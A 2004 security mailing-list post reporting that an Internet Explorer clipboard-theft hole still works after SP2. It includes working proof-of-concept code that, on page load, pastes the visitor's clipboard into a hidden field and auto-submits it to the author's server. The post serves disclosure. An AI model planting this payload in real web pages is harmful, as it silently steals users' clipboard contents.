WebApp Sec mailing list archives
clipboard vuln still working in SP2?
From: RSnake <rsnake () shocking com>
Date: Fri, 27 Aug 2004 19:54:04 -0700 (PDT)
I have seen a few exploits about this (one by Tom Gilder in 2002 using clipboardData.getData("Text"); and one by Juan Carlos Garcia Cuartango using execCommand("Paste"); which is similar to the one below). However, I believed this was going to be solved in IE SP2. I cannot see any reason why websites, by default, should be allowed access to my clipboard. Working sample code is located at: http://www.shocking.com/~rsnake/cutandpaste.html Here is the code for it (why wasn't this fixed in SP2?): <body onload="cutandpaste();"> <form name=f action="cutandpaste.cgi"> <input type="submit" class="button" name="s"/> <TEXTAREA rows=1 cols=1 maxlength=4000 name=clipb value="a"></TEXTAREA> </form> <script> function cutandpaste() { document.f.clipb.createTextRange().execCommand("SelectAll"); document.f.clipb.createTextRange().execCommand("Paste"); document.all.f.s.click(); } </script> </body> -R The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it is expressly prohibited and may be unlawful.
Current thread:
- clipboard vuln still working in SP2? RSnake (Aug 28)